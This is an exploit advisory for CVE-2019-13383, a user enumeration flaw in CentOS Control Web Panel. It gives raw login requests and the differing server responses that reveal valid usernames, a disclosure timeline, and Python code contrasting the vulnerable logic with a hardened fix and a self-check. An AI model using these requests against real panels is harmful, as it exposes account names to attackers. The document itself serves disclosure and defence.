# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.848 User Enumeration via HTTP Response Message
# Date: 15 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/changelog
# Software Link: Not available, user panel only available for latest version
# Version: 0.9.8.836 to 0.9.8.847
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13383

# ====================================================================
# Information
# ====================================================================

Product   : CWP Control Web Panel
Version   : 0.9.8.838
Fixed on  : 0.9.8.848
Tested on : CentOS 7.6.1810 (Core)
Reference : https://control-webpanel.com/
CVE-Number: 2019-13383

# ====================================================================
# Root cause of the vulnerability
# ====================================================================

The server responds with a different message depending on whether the login username is valid or invalid. This allows attackers to check whether a username is valid by reading the HTTP response.

# ====================================================================
# Steps to Reproduce
# ====================================================================

1. Log in with a random username and an invalid password

POST /login/index.php?acc=validate HTTP/1.1
Host: 192.168.80.137:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: d41d8cd98f00b204e9800998ecf8427e
X-Requested-With: XMLHttpRequest
Content-Length: 30
Connection: close
Referer: https://192.168.80.137:2083/login/?acc=logon

username=AAA&password=c2Rmc2Rm

2. Check the HTTP response body

2.1 User does not exist (server responds with "suspended")

HTTP/1.1 200 OK
Server: cwpsrv
Date: Mon, 15 Jul 2019 01:39:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.0.32
Content-Length: 9

suspended

2.2 User does exist (server responds with an empty body)

HTTP/1.1 200 OK
Server: cwpsrv
Date: Mon, 15 Jul 2019 01:40:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.0.32
Content-Length: 0

3. The HTTP response body format depends on the software version, but every version responds differently for valid and invalid usernames, as in the example below

------------------------------------------------------------
| Username | Password | Result                   |
------------------------------------------------------------
| valid    | valid    | login success            |
| valid    | invalid  | {"error":"failed"}       |
| invalid  | invalid  | {"error":"user_invalid"} |
------------------------------------------------------------

# ====================================================================
# PoC
# ====================================================================

https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13383.md

# ====================================================================
# Timeline
# ====================================================================

2019-07-06: Discovered the bug
2019-07-06: Reported to vendor
2019-07-06: Vendor accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-15: Published

# ====================================================================
# Discovered by
# ====================================================================

Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak
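The root cause above is a login handler whose failure responses differ by whether the username exists. The following Python example is added here to illustrate that pattern and its fix; it is not CWP's code (CWP is written in PHP) and it does not reproduce the real application's user store. `vulnerable_validate` mirrors the distinct bodies shown in the table, `hardened_validate` returns one generic failure body and always performs one password hash so that neither the body nor the timing depends on whether the username is known, and `leaks_username` is a defender-side self-check that a login endpoint can be run against before release. The account data is constructed for the example.

```python
import hashlib
import hmac
import json
import os

# Constructed sample store for the example: username -> (salt, PBKDF2 hash).
# This is an assumption for illustration, not how CWP stores accounts.
_ITERATIONS = 100_000


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITERATIONS)


def make_user_store(accounts: dict) -> dict:
    """Build a salted-hash store from plaintext accounts (constructed test data)."""
    store = {}
    for name, password in accounts.items():
        salt = os.urandom(16)
        store[name] = (salt, _hash_password(password, salt))
    return store


# A dummy credential hashed once at start-up, so that validating an unknown
# username costs the same amount of work as validating a known one.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash_password("dummy-password-never-accepted", _DUMMY_SALT)


def _error(code: str) -> str:
    # Compact JSON, matching the {"error":"..."} bodies quoted in the advisory.
    return json.dumps({"error": code}, separators=(",", ":"))


def vulnerable_validate(store: dict, username: str, password: str) -> str:
    """Mirrors the behaviour described in the advisory: the body tells the
    caller whether the username exists before the password is even checked."""
    if username not in store:
        return _error("user_invalid")
    salt, expected = store[username]
    if hmac.compare_digest(_hash_password(password, salt), expected):
        return "login success"
    return _error("failed")


def hardened_validate(store: dict, username: str, password: str) -> str:
    """One generic failure body for every failed login, and exactly one hash
    computation on every path, so the response leaks nothing about the user."""
    salt, expected = store.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    match = hmac.compare_digest(_hash_password(password, salt), expected)
    # The membership check is evaluated after the hash so the work done is
    # identical for known and unknown usernames.
    if match and username in store:
        return "login success"
    return _error("failed")


def leaks_username(validate, store: dict, known_user: str, unknown_user: str) -> bool:
    """Defender self-check: True if a known user with a wrong password and an
    unknown user produce different response bodies (i.e. enumeration is possible)."""
    wrong = "definitely-not-the-password"
    return validate(store, known_user, wrong) != validate(store, unknown_user, wrong)


if __name__ == "__main__":
    store = make_user_store({"admin": "S3cret!"})  # constructed sample account
    for name, fn in (("vulnerable", vulnerable_validate), ("hardened", hardened_validate)):
        print(f"{name}: leaks username? {leaks_username(fn, store, 'admin', 'AAA')}")
```

The self-check compares only response bodies; a full review of a login endpoint should also compare status codes, headers such as `Content-Length`, and response timing, since any of these can carry the same signal.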